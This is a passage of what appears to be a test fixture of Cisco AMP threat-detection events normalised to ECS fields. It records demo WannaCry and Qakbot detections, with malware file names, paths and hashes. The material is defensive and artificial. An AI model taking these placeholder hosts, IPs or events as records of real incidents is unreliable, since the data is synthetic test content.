"{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419229327140848000,\"timestamp\":1610635264,\"timestamp_nanoseconds\":667000000,\"date\":\"2021-01-14T14:41:04+00:00\",\"event_type\":\"Threat 
Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.ED01EBFBC9-100.SBX.TG\",\"detection_id\":\"6419229327140847665\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"tasksche.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\ProgramData\\\\qzkbplcgew884\\\\tasksche.exe\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\",\"sha1\":\"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467\",\"md5\":\"84c82835a5d21bbcf75a61706d8ab549\"},\"parent\":{\"process_id\":4772,\"disposition\":\"Malicious\",\"file_name\":\"tasksche.exe\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}}", + "kind": "alert", + "action": "Threat Detected", + "id": "6419229327140848000", + "category": [ + "file", + "malware" + ] + }, + "cisco": { + "amp": { + "detection": "W32.ED01EBFBC9-100.SBX.TG", + "computer": { + "active": true, + "network_addresses": [ + { + "mac": "53:74:31:cb:37:50", + "ip": "10.10.10.10" + } + ], + "connector_guid": "test_connector_guid", + "external_ip": "8.8.8.8" + }, + "file": { + "parent": { + "disposition": "Malicious", + "identity": {} + }, + "disposition": "Malicious", + "identity": {} + }, + "connector_guid": "test_connector_guid", + "related": { + "mac": [ + "53:74:31:cb:37:50" + ] + }, + "group_guids": [ + "test_group_guid" + ], + "detection_id": "6419229327140847665", + "event_type_id": 
1090519054 + } + }, + "tags": [ + "preserve_original_event" + ] + }, + { + "process": { + "name": "lsass.exe", + "pid": 708, + "hash": { + "sha1": "7abcc82dc5a05b4f53fd0fbd386738e5555025cf", + "sha256": "26f36ca31a1b977685f8df5f8436848b7d4143b47ec0dae68f8382c1b52a6c71", + "md5": "4e568dbe3fff1a0025eb432dc929b78f" + } + }, + "@timestamp": "2021-01-14T14:41:04.000Z", + "file": { + "name": "mssecsvc.exe", + "path": "\\\\?\\C:\\WINDOWS\\mssecsvc.exe", + "hash": { + "sha256": "24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c" + } + }, + "ecs": { + "version": "1.11.0" + }, + "related": { + "user": [ + "user@testdomain.com" + ], + "hosts": [ + "Demo_WannaCry_Ransomware" + ], + "hash": [ + "24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c" + ], + "ip": [ + "8.8.8.8", + "10.10.10.10" + ] + }, + "host": { + "name": "Demo_WannaCry_Ransomware", + "hostname": "Demo_WannaCry_Ransomware", + "os": { + "family": "windows", + "platform": "windows" + }, + "user": { + "name": "user@testdomain.com" + } + }, + "event": { + "severity": 2, + "ingested": "2021-09-12T17:32:10.094044602Z", + "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419229327140848000,\"timestamp\":1610635264,\"timestamp_nanoseconds\":28000000,\"date\":\"2021-01-14T14:41:04+00:00\",\"event_type\":\"Threat 
Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.Gen.20gl.1201\",\"detection_id\":\"6419229327140847656\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"mssecsvc.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\WINDOWS\\\\mssecsvc.exe\",\"identity\":{\"sha256\":\"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c\"},\"parent\":{\"process_id\":708,\"disposition\":\"Clean\",\"file_name\":\"lsass.exe\",\"identity\":{\"sha256\":\"26f36ca31a1b977685f8df5f8436848b7d4143b47ec0dae68f8382c1b52a6c71\",\"sha1\":\"7abcc82dc5a05b4f53fd0fbd386738e5555025cf\",\"md5\":\"4e568dbe3fff1a0025eb432dc929b78f\"}}}}}", + "kind": "alert", + "action": "Threat Detected", + "id": "6419229327140848000", + "category": [ + "file", + "malware" + ] + }, + "cisco": { + "amp": { + "detection": "W32.Gen.20gl.1201", + "computer": { + "active": true, + "network_addresses": [ + { + "mac": "53:74:31:cb:37:50", + "ip": "10.10.10.10" + } + ], + "connector_guid": "test_connector_guid", + "external_ip": "8.8.8.8" + }, + "file": { + "parent": { + "disposition": "Clean", + "identity": {} + }, + "disposition": "Malicious", + "identity": {} + }, + "connector_guid": "test_connector_guid", + "related": { + "mac": [ + "53:74:31:cb:37:50" + ] + }, + "group_guids": [ + "test_group_guid" + ], + "detection_id": "6419229327140847656", + "event_type_id": 1090519054 + } + }, + "tags": [ + 
"preserve_original_event" + ] + }, + { + "process": { + "name": "lsass.exe", + "pid": 708, + "hash": { + "sha1": "7abcc82dc5a05b4f53fd0fbd386738e5555025cf", + "sha256": "26f36ca31a1b977685f8df5f8436848b7d4143b47ec0dae68f8382c1b52a6c71", + "md5": "4e568dbe3fff1a0025eb432dc929b78f" + } + }, + "@timestamp": "2021-01-14T14:41:03.000Z", + "file": { + "name": "mssecsvc.exe", + "path": "\\\\?\\C:\\Windows\\mssecsvc.exe", + "hash": { + "sha1": "e889544aff85ffaf8b0d0da705105dee7c97fe26", + "sha256": "24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c", + "md5": "db349b97c37d22f5ea1d1841e3c89eb4" + } + }, + "ecs": { + "version": "1.11.0" + }, + "related": { + "user": [ + "user@testdomain.com" + ], + "hosts": [ + "Demo_WannaCry_Ransomware" + ], + "hash": [ + "24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c", + "db349b97c37d22f5ea1d1841e3c89eb4", + "e889544aff85ffaf8b0d0da705105dee7c97fe26" + ], + "ip": [ + "8.8.8.8", + "10.10.10.10" + ] + }, + "host": { + "name": "Demo_WannaCry_Ransomware", + "hostname": "Demo_WannaCry_Ransomware", + "os": { + "family": "windows", + "platform": "windows" + }, + "user": { + "name": "user@testdomain.com" + } + }, + "event": { + "severity": 2, + "ingested": "2021-09-12T17:32:10.094046511Z", + "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419229322845880000,\"timestamp\":1610635263,\"timestamp_nanoseconds\":950000000,\"date\":\"2021-01-14T14:41:03+00:00\",\"event_type\":\"Threat 
Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.Gen.20gl.1201\",\"detection_id\":\"6419229322845880359\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"mssecsvc.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Windows\\\\mssecsvc.exe\",\"identity\":{\"sha256\":\"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c\",\"sha1\":\"e889544aff85ffaf8b0d0da705105dee7c97fe26\",\"md5\":\"db349b97c37d22f5ea1d1841e3c89eb4\"},\"parent\":{\"process_id\":708,\"disposition\":\"Clean\",\"file_name\":\"lsass.exe\",\"identity\":{\"sha256\":\"26f36ca31a1b977685f8df5f8436848b7d4143b47ec0dae68f8382c1b52a6c71\",\"sha1\":\"7abcc82dc5a05b4f53fd0fbd386738e5555025cf\",\"md5\":\"4e568dbe3fff1a0025eb432dc929b78f\"}}}}}", + "kind": "alert", + "action": "Threat Detected", + "id": "6419229322845880000", + "category": [ + "file", + "malware" + ] + }, + "cisco": { + "amp": { + "detection": "W32.Gen.20gl.1201", + "computer": { + "active": true, + "network_addresses": [ + { + "mac": "53:74:31:cb:37:50", + "ip": "10.10.10.10" + } + ], + "connector_guid": "test_connector_guid", + "external_ip": "8.8.8.8" + }, + "file": { + "parent": { + "disposition": "Clean", + "identity": {} + }, + "disposition": "Malicious", + "identity": {} + }, + "connector_guid": "test_connector_guid", + "related": { + "mac": [ + "53:74:31:cb:37:50" + ] + }, + "group_guids": [ + "test_group_guid" + ], + "detection_id": 
"6419229322845880359", + "event_type_id": 1090519054 + } + }, + "tags": [ + "preserve_original_event" + ] + }, + { + "@timestamp": "2021-01-14T14:37:40.000Z", + "file": { + "hash": { + "sha256": "dd6d4fedd34a4d0e5c62b0e6d8c734d157ee921e07cddc82251755bed0de3f91" + } + }, + "ecs": { + "version": "1.11.0" + }, + "related": { + "hosts": [ + "Demo_Qakbot_1" + ], + "hash": [ + "dd6d4fedd34a4d0e5c62b0e6d8c734d157ee921e07cddc82251755bed0de3f91" + ], + "ip": [ + "8.8.8.8", + "10.10.10.10" + ] + }, + "host": { + "name": "Demo_Qakbot_1", + "hostname": "Demo_Qakbot_1" + }, + "event": { + "severity": 3, + "ingested": "2021-09-12T17:32:10.094048415Z", + "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6411488666497057000,\"timestamp\":1610635060,\"timestamp_nanoseconds\":913000000,\"date\":\"2021-01-14T14:37:40+00:00\",\"event_type\":\"Retrospective Quarantine Attempt Failed\",\"event_type_id\":2164260893,\"detection_id\":\"6411488666497056775\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"error\":{\"error_code\":3221225524,\"description\":\"Object name not found\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Qakbot_1\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"f9:65:da:22:2a:41\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"dd6d4fedd34a4d0e5c62b0e6d8c734d157ee921e07cddc82251755bed0de3f91\"}}}}", + 
"kind": "alert", + "action": "Retrospective Quarantine Attempt Failed", + "id": "6411488666497057000", + "category": [ + "malware" + ] + }, + "cisco": { + "amp": { + "computer": { + "active": true, + "network_addresses": [ + { + "mac": "f9:65:da:22:2a:41", + "ip": "10.10.10.10" + } + ], + "connector_guid": "test_connector_guid", + "external_ip": "8.8.8.8" + }, + "file": { + "disposition": "Malicious", + "identity": {} + }, + "connector_guid": "test_connector_guid", + "related": { + "mac": [ + "f9:65:da:22:2a:41" + ] + }, + "group_guids": [ + "test_group_guid" + ], + "error": { + "description": "Object name not found", + "error_code": 3221225524 + }, + "detection_id": "6411488666497056775", + "event_type_id": 2164260893 + } + }, + "tags": [ + "preserve_original_event" + ] + }, + { + "@timestamp": "2021-01-14T14:37:40.000Z", + "file": { + "hash": { + "sha256": "dd6d4fedd34a4d0e5c62b0e6d8c734d157ee921e07cddc82251755bed0de3f91" + } + }, + "ecs": { + "version": "1.11.0" + }, + "related": { + "hosts": [ + "Demo_Qakbot_1" + ], + "hash": [ + "dd6d4fedd34a4d0e5c62b0e6d8c734d157ee921e07cddc82251755bed0de3f91" + ], + "ip": [ + "8.8.8.8", + "10.10.10.10" + ] + }, + "host": { + "name": "Demo_Qakbot_1", + "hostname": "Demo_Qakbot_1" + }, + "event": { + "severity": 3, + "ingested": "2021-09-12T17:32:10.094050302Z", + "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6411488666497057000,\"timestamp\":1610635060,\"timestamp_nanoseconds\":913000000,\"date\":\"2021-01-14T14:37:40+00:00\",\"event_type\":\"Retrospective Quarantine Attempt 
Failed\",\"event_type_id\":2164260893,\"detection_id\":\"6411488666497056774\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"error\":{\"error_code\":3221225524,\"description\":\"Object name not found\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Qakbot_1\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"f9:65:da:22:2a:41\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"dd6d4fedd34a4d0e5c62b0e6d8c734d157ee921e07cddc82251755bed0de3f91\"}}}}", + "kind": "alert", + "action": "Retrospective Quarantine Attempt Failed", + "id": "6411488666497057000", + "category": [ + "malware" + ] + }, + "cisco": { + "amp": { + "computer": { + "active": true, + "network_addresses": [ + { + "mac": "f9:65:da:22:2a:41", + "ip": "10.10.10.10" + } + ], + "connector_guid": "test_connector_guid", + "external_ip": "8.8.8.8" + }, + "file": { + "disposition": "Malicious", + "identity": {} + }, + "connector_guid": "test_connector_guid", + "related": { + "mac": [ + "f9:65:da:22:2a:41" + ] + }, + "group_guids": [ + "test_group_guid" + ], + "error": { + "description": "Object name not found", + "error_code": 3221225524 + }, + "detection_id": "6411488666497056774", + "event_type_id": 2164260893 + } + }, + "tags": [ + "preserve_original_event" + ] + }, + { + "@timestamp": "2021-01-14T14:37:40.000Z", + "file": { + "hash": { + "sha256": "dd6d4fedd34a4d0e5c62b0e6d8c734d157ee921e07cddc82251755bed0de3f91" + } + }, + "ecs": { + "version": "1.11.0" + }, + "related": { + "hosts": [ + "Demo_Qakbot_1" + ], + "hash": [ + "dd6d4fedd34a4d0e5c62b0e6d8c734d157ee921e07cddc82251755bed0de3f91" + ], + "ip": [ + "8.8.8.8", + 
"10.10.10.10" + ] + }, + "host": { + "name": "Demo_Qakbot_1", + "hostname": "Demo_Qakbot_1" + }, + "event": { + "severity": 3, + "ingested": "2021-09-12T17:32:10.094052189Z", + "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6411488666497057000,\"timestamp\":1610635060,\"timestamp_nanoseconds\":913000000,\"date\":\"2021-01-14T14:37:40+00:00\",\"event_type\":\"Retrospective Quarantine\",\"event_type_id\":553648155,\"detection_id\":\"6411488666497056773\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Qakbot_1\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"f9:65:da:22:2a:41\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"dd6d4fedd34a4d0e5c62b0e6d8c734d157ee921e07cddc82251755bed0de3f91\"}}}}", + "kind": "alert", + "action": "Retrospective Quarantine", + "id": "6411488666497057000", + "category": [ + "malware" + ] + }, + "cisco": { + "amp": { + "computer": { + "active": true, + "network_addresses": [ + { + "mac": "f9:65:da:22:2a:41", + "ip": "10.10.10.10" + } + ], + "connector_guid": "test_connector_guid", + "external_ip": "8.8.8.8" + }, + "file": { + "disposition": "Malicious", + "identity": {} + }, + "connector_guid": "test_connector_guid", + "related": { + "mac": [ + "f9:65:da:22:2a:41" + ] + }, + "detection_id": "6411488666497056773", + "group_guids": 
[ + "test_group_guid" + ], + "event_type_id": 553648155 + } + }, + "tags": [ + "preserve_original_event" + ] + }, + { + "@timestamp": "2021-01-14T14:37:40.000Z", + "file": { + "name": "qYf.exe", + "path": "\\\\?\\C:\\Users\\johndoe\\Documents\\qYf.exe", + "hash": { + "sha256": "dd6d4fedd34a4d0e5c62b0e6d8c734d157ee921e07cddc82251755bed0de3f91" + } + }, + "ecs": { + "version": "1.11.0" + }, + "related": { + "hosts": [ + "Demo_Qakbot_1" + ], + "hash": [ + "dd6d4fedd34a4d0e5c62b0e6d8c734d157ee921e07cddc82251755bed0de3f91" + ], + "ip": [ + "8.8.8.8", + "10.10.10.10" + ] + }, + "host": { + "os": { + "family": "windows", + "platform": "windows" + }, + "name": "Demo_Qakbot_1", + "hostname": "Demo_Qakbot_1" + }, + "event": { + "severity": 3, + "ingested": "2021-09-12T17:32:10.094054051Z", + "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6411488666497057000,\"timestamp\":1610635060,\"timestamp_nanoseconds\":398000000,\"date\":\"2021-01-14T14:37:40+00:00\",\"event_type\":\"Retrospective 
Detection\",\"event_type_id\":553648147,\"detection\":\"W32.DD6D4FEDD3-100.SBX.TG\",\"detection_id\":\"6411488666497056775\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Qakbot_1\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"f9:65:da:22:2a:41\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"qYf.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Users\\\\johndoe\\\\Documents\\\\qYf.exe\",\"identity\":{\"sha256\":\"dd6d4fedd34a4d0e5c62b0e6d8c734d157ee921e07cddc82251755bed0de3f91\"}}}}", + "kind": "alert", + "action": "Retrospective Detection", + "id": "6411488666497057000", + "category": [ + "file", + "malware" + ] + }, + "cisco": { + "amp": { + "detection": "W32.DD6D4FEDD3-100.SBX.TG", + "computer": { + "active": true, + "network_addresses": [ + { + "mac": "f9:65:da:22:2a:41", + "ip": "10.10.10.10" + } + ], + "connector_guid": "test_connector_guid", + "external_ip": "8.8.8.8" + }, + "file": { + "disposition": "Malicious", + "identity": {} + }, + "connector_guid": "test_connector_guid", + "related": { + "mac": [ + "f9:65:da:22:2a:41" + ] + }, + "group_guids": [ + "test_group_guid" + ], + "detection_id": "6411488666497056775", + "event_type_id": 553648147 + } + }, + "tags": [ + "preserve_original_event" + ] + }, + { + "@timestamp": "2021-01-14T14:37:40.000Z", + "file": { + "name": "4191700.exe", + "path": "\\\\?\\C:\\Users\\johndoe\\AppData\\Local\\Temp\\4191700.exe", + "hash": { + "sha256": "dd6d4fedd34a4d0e5c62b0e6d8c734d157ee921e07cddc82251755bed0de3f91" + } + }, + "ecs": { + "version": "1.11.0" + }, + "related": { + "hosts": [ + 
"Demo_Qakbot_1" + ], + "hash": [ + "dd6d4fedd34a4d0e5c62b0e6d8c734d157ee921e07cddc82251755bed0de3f91" + ], + "ip": [ + "8.8.8.8", + "10.10.10.10" + ] + }, + "host": { + "os": { + "family": "windows", + "platform": "windows" + }, + "name": "Demo_Qakbot_1", + "hostname": "Demo_Qakbot_1" + }, + "event": { + "severity": 3, + "ingested": "2021-09-12T17:32:10.094055941Z", + "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6411488666497057000,\"timestamp\":1610635060,\"timestamp_nanoseconds\":398000000,\"date\":\"2021-01-14T14:37:40+00:00\",\"event_type\":\"Retrospective Detection\",\"event_type_id\":553648147,\"detection\":\"W32.DD6D4FEDD3-100.SBX.TG\",\"detection_id\":\"6411488666497056774\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Qakbot_1\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"f9:65:da:22:2a:41\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"4191700.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Users\\\\johndoe\\\\AppData\\\\Local\\\\Temp\\\\4191700.exe\",\"identity\":{\"sha256\":\"dd6d4fedd34a4d0e5c62b0e6d8c734d157ee921e07cddc82251755bed0de3f91\"}}}}", + "kind": "alert", + "action": "Retrospective Detection", + "id": "6411488666497057000", + "category": [ + "file", + "malware" + ] + }, + "cisco": { + "amp": { + "detection": "W32.DD6D4FEDD3-100.SBX.TG", + 
"computer": { + "active": true, + "network_addresses": [ + { + "mac": "f9:65:da:22:2a:41", + "ip": "10.10.10.10" + } + ], + "connector_guid": "test_connector_guid", + "external_ip": "8.8.8.8" + }, + "file": { + "disposition": "Malicious", + "identity": {} + }, + "connector_guid": "test_connector_guid", + "related": { + "mac": [ + "f9:65:da:22:2a:41" + ] + }, + "group_guids": [ + "test_group_guid" + ], + "detection_id": "6411488666497056774", + "event_type_id": 553648147 + } + }, + "tags": [ + "preserve_original_event" + ] + }, + { + "@timestamp": "2021-01-14T14:37:40.000Z", + "file": { + "name": "MspthrdHash.exe", + "path": "\\\\?\\C:\\Users\\johndoe\\AppData\\Local\\MspthrdHash\\MspthrdHash.exe", + "hash": { + "sha1": "8cf0ca99a8f5019d8583133b9a9379299c45470c", + "sha256": "dd6d4fedd34a4d0e5c62b0e6d8c734d157ee921e07cddc82251755bed0de3f91", + "md5": "6894b3834bd541fa85df79e44568acac" + } + }, + "ecs": { + "version": "1.11.0" + }, + "related": { + "hosts": [ + "Demo_Qakbot_1" + ], + "hash": [ + "dd6d4fedd34a4d0e5c62b0e6d8c734d157ee921e07cddc82251755bed0de3f91", + "6894b3834bd541fa85df79e44568acac", + "8cf0ca99a8f5019d8583133b9a9379299c45470c" + ], + "ip": [ + "8.8.8.8", + "10.10.10.10" + ] + }, + "host": { + "os": { + "family": "windows", + "platform": "windows" + }, + "name": "Demo_Qakbot_1", + "hostname": "Demo_Qakbot_1" + }, + "event": { + "severity": 3, + "ingested": "2021-09-12T17:32:10.094057915Z", + "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6411488666497057000,\"timestamp\":1610635060,\"timestamp_nanoseconds\":398000000,\"date\":\"2021-01-14T14:37:40+00:00\",\"event_type\":\"Retrospective 
Detection\",\"event_type_id\":553648147,\"detection\":\"W32.DD6D4FEDD3-100.SBX.TG\",\"detection_id\":\"6411488666497056773\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Qakbot_1\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"f9:65:da:22:2a:41\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"MspthrdHash.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Users\\\\johndoe\\\\AppData\\\\Local\\\\MspthrdHash\\\\MspthrdHash.exe\",\"identity\":{\"sha256\":\"dd6d4fedd34a4d0e5c62b0e6d8c734d157ee921e07cddc82251755bed0de3f91\",\"sha1\":\"8cf0ca99a8f5019d8583133b9a9379299c45470c\",\"md5\":\"6894b3834bd541fa85df79e44568acac\"}}}}", + "kind": "alert", + "action": "Retrospective Detection", + "id": "6411488666497057000", + "category": [ + "file", + "malware" + ] + }, + "cisco": { + "amp": { + "detection": "W32.DD6D4FEDD3-100.SBX.TG", + "computer": { + "active": true, + "network_addresses": [ + { + "mac": "f9:65:da:22:2a:41", + "ip": "10.10.10.10" + } + ], + "connector_guid": "test_connector_guid", + "external_ip": "8.8.8.8" + }, + "file": { + "disposition": "Malicious", + "identity": {} + }, + "connector_guid": "test_connector_guid", + "related": { + "mac": [ + "f9:65:da:22:2a:41" + ] + }, + "group_guids": [ + "test_group_guid" + ], + "detection_id": "6411488666497056773", + "event_type_id": 553648147 + } + }, + "tags": [ + "preserve_original_event" + ] + }, + { + "process": { + "hash": { + "sha256": "b9c3eea0c27244f91cce86d57aca2b3f8d09f1dbd6274751226c6b09398a7ba4" + } + }, + "@timestamp": "2021-01-14T14:09:00.000Z", + "file": { + "name": "cmd.exe", + 
